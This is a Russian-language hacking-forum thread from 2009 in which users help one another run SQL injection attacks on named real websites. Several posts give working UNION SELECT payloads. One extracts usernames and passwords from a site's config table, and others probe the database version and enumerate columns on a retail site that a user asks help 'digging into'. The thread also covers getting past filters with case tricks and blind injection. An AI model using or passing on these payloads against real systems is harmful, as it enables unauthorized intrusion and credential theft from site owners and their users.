Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.12.2009, 22:26
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от mailbrush
Потому что таблички users не существует...
PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...
Она существует но пустая
-1%20union%20select%201,2,3,count(*),5,6+from+users--
ЗЫ раньше он вообще на албани писал ((
|
|
|
17.12.2009, 23:27
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Strilo4ka
YuNi|[c почитай статьи и разберешся если mysql 5 то есть схема, если ниже то брутить таблицы! Есть влом читать то тулзу пашкелы и вперед если надо брутить (и не только) . Если ось win, то в переменных пропишы окружения путь в path до интерпретатора perl и не забуть директиву роскоментировать в апаче если апач ScriptInterpreterSource registry или впишы ели ее нет и перегрузи windows. . потом win+r -> cmd -> perl путь до_тулзи_пашкели и там разберешся 
спс я уже про тулзу с его выхода знаю и сам протестил))
Тут не MySql а какой то с нестандартыми ответами Access с Jet компонентом. Все таки не смог брути таблицы никакого, наверное префикс надо гадать.
|
|
|
|
17.12.2009, 23:28
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
как можно выполнить инъекцию если на union на сайте стоит фильтр ?
|
|
|
|
17.12.2009, 23:35
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от M1ks
как можно выполнить инъекцию если на union на сайте стоит фильтр ?
Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.
|
|
|
|
17.12.2009, 23:39
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
mailbrush - так и быть понтанусь
LokbatanLi - )))ya toze pisy translitom
Код:
http://www.section404.org/news.php?id=1/**/and/**/1=0%20/**/union/**/all/**/select/**/0,0,0,concat_ws%280x3a,username,password%29,0,0/**/from/**/config--
|
|
|
|
17.12.2009, 23:53
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
Сообщение от mailbrush
Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.
с регистром не прокатывает..
|
|
|
|
18.12.2009, 01:01
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
M1ks мне в лс ссылку если не трудно  |
|
|
|
18.12.2009, 07:31
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от M1ks
как можно выполнить инъекцию если на union на сайте стоит фильтр ?
При наличии слова он его вырезает, или редирект, etc ?
|
|
|
|
18.12.2009, 18:15
|
|
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме:
1031617
Репутация:
128
|
|
http://www.discount.ru/search.html?find=-1%27&search=%E8%F1%EA%E0%F2%FC
нашел. Это sql-inj илил нет?
если да,помогите раскопать дальше
|
|
|
|
18.12.2009, 18:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Код:
http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC
версия 4.0*
полей 14, выводится 3е.
Код:
http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4%2F*&search=%E8%F1%EA%E0%F2%FC
зы удаляйте пробелы в коде.
Последний раз редактировалось geezer.code; 18.12.2009 в 19:03..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
